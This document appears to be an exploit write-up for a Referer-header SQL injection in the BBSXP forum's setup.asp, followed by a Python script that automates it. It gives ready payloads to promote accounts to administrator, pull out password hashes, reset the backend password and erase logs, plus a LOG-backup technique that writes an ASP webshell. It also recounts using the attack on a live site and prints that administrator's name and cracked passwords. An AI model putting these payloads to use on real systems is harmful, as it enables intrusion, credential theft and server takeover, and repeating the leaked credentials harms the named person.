The vulnerability is in the file setup.asp (the Referer request header is written into the bbsxp_log table without being escaped, so an extra T-SQL statement can be appended to it).
Part 1
Attack chain: register -> log in -> post -> edit the post -> capture the request -> modify the packet -> promote yourself to administrator -> change the backend password -> log in to the backend -> WEBSHELL
Here I set the password to ttfct1, submitted the modified packet with nc, and the promotion to administrator succeeded. I logged in to the backend with the password ttfct1, the log backup succeeded, and the WEBSHELL was obtained.
There are two ways to get a WEBSHELL. A: in the backend, add htr to the allowed upload types and upload through the backend. B: LOG backup (the statements are listed at the end).
Part 2
Testing the official site. I had already registered there; the user is sina147. Register -> log in -> post -> edit the post -> capture the request. In order not to attract the administrators' attention, we do not promote our own account; instead we read out the administrator's password and the backend password directly, then log in to the backend.
Sorry, a small problem: power outage. Continuing: capture, modify. I checked, and yuzi is the administrator.
yuzi's password hash -> plaintext: 5D4D89BEA718BEE10686FB053E86F13B -> 080532779. Backend login password hash -> plaintext: 531BC3E862F67DC2BAA871EABDE81A4F -> 080532449.
After logging in to the backend, one page discloses a physical path, D:\www\bbs.yuzi.net\Admin_other.asp. With the physical path known, there is a chance to get a WEBSHELL. The rest was not recorded in the video; try it yourselves.
The payloads go in the Referer header of the captured edit-post request. Everything before the first ; closes the string value and the forum's own INSERT into bbsxp_log; the statement after it is what actually runs. Substitute your own username: the post uses sina in some payloads and sina147 in others.
Promote to administrator: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserRoleID=1 where username='sina'--
Get the administrator password (the primary password) by copying its hash into the e-mail field of our own account, where it can be read from the profile page: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserMail=(select userpass from bbsxp_users where username='yuzi') where username='sina147'
Get the backend password (the secondary password) the same way: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'
Change the backend (secondary) password to the hash of our own account's password: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')
Delete our log entries: Referer: http://127.0.0.1',",",'modify post success');delete from bbsxp_log where username='sina147'
LOG backup. Backup destination: C:\Inetpub\wwwroot\ttfct.asp. Each statement below is sent as the part after the ; in the Referer payload. The 0x... values are hex string literals, so the statements need no quote characters.
Step 1: create table [dbo].[shit_tmp] ([cmd] [image])
Step 2: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk=@s with init,no_truncate (the hex is the nvarchar literal for yiaolu, a throw-away file name; this first backup flushes the existing log so the next backup file stays small)
Step 3: insert into shit_tmp values(0x3C25657865637574652872657175657374282261222929253e) (the hex is the ASP one-liner <%execute(request("a"))%>)
Step 4: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005c0077007700770072006f006f0074005c00740074006600630074002e00610073007000 backup log @a to disk=@s with init,no_truncate (the hex is the nvarchar literal for C:\Inetpub\wwwroot\ttfct.asp; the log now contains the inserted row and is written under the web root, where IIS runs it as ASP)
Step 5: drop table [shit_tmp]
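The following is an added example, not code from the original post or from BBSXP itself. It serves both the Referer-header payloads and the LOG-backup steps above: it builds the Referer value from the prefix the post uses, encodes file names and the ASP one-liner as the 0x... literals that steps 2 to 4 need, decodes the literals the post shows so they can be checked, and prints the raw HTTP request as one would pipe it into nc. The host (127.0.0.1), the request path (/edit.asp) and the form body are placeholders and assumptions; the post does not show them, and it does not show the forum's own INSERT into bbsxp_log, so that statement is not reproduced here.

```python
"""Added example; this is not code from the original post or from BBSXP.

It wires together the two things the post relies on: (1) the Referer-header
injection, where the prefix copied from the post closes the forum's own INSERT
into bbsxp_log so that a second statement can run, and (2) the LOG-backup
webshell, whose 0x... literals are nvarchar/varchar hex so the statements need
no quote characters.  The host, request path and form body used at the bottom
are placeholders (assumptions): the post does not show them, and it does not
show the forum's logging INSERT, so that statement is not reproduced here.
"""


# Copied verbatim from the post.  The closing quote and ")" terminate the
# forum's own string value and INSERT; ";" starts our statement.
REFERER_PREFIX = "http://127.0.0.1',\",\",'modify post success');"


def referer_payload(statement: str) -> str:
    """Referer value carrying an extra T-SQL statement."""
    return REFERER_PREFIX + statement


def nvarchar_hex(text: str) -> str:
    """0x... literal for an nvarchar value: UTF-16LE, as in steps 2 and 4."""
    return "0x" + text.encode("utf-16-le").hex().upper()


def varchar_hex(text: str) -> str:
    """0x... literal for a single-byte string, as in step 3 (the ASP one-liner)."""
    return "0x" + text.encode("ascii").hex().upper()


def decode_hex_literal(literal: str, wide: bool) -> str:
    """Reverse of the two helpers above; handy for reading someone else's payload."""
    raw = bytes.fromhex(literal[2:])
    return raw.decode("utf-16-le" if wide else "ascii")


def log_backup_statements(dest_path: str, shell: str,
                          scratch_name: str = "yiaolu",
                          table: str = "shit_tmp") -> list[str]:
    """The five statements of the post, parameterised.

    Step 2 backs the log up once to a throw-away file (with init), the usual
    reason being to flush existing log records so the next backup is small;
    step 4 then writes the log, now containing the row inserted in step 3, to a
    path under the web root, where IIS runs it as ASP.  ASP emits the binary
    log bytes as static content and executes only the <% ... %> block.
    """
    backup = ("declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s={} "
              "backup log @a to disk=@s with init,no_truncate")
    return [
        f"create table [dbo].[{table}] ([cmd] [image])",
        backup.format(nvarchar_hex(scratch_name)),
        f"insert into {table} values({varchar_hex(shell)})",
        backup.format(nvarchar_hex(dest_path)),
        f"drop table [{table}]",
    ]


def raw_request(host: str, path: str, body: str, referer: str) -> bytes:
    """The HTTP request as one would pipe it into nc (what the post calls 'NC submit')."""
    lines = [
        f"POST {path} HTTP/1.0",
        f"Host: {host}",
        f"Referer: {referer}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
        "",
        body,
    ]
    return "\r\n".join(lines).encode()


if __name__ == "__main__":
    shell = '<%execute(request("a"))%>'
    for stmt in log_backup_statements(r"C:\Inetpub\wwwroot\ttfct.asp", shell):
        # Assumed host, path and body; the real edit-post request must be captured.
        req = raw_request("127.0.0.1", "/edit.asp", "id=1&content=x",
                          referer_payload(stmt))
        print(req.decode(), end="\n\n")
```

Each of the five requests printed by the script carries one statement; they must be sent in order, and the edit-post form body has to be taken from your own captured request, since the placeholder body above will not pass the forum's own checks.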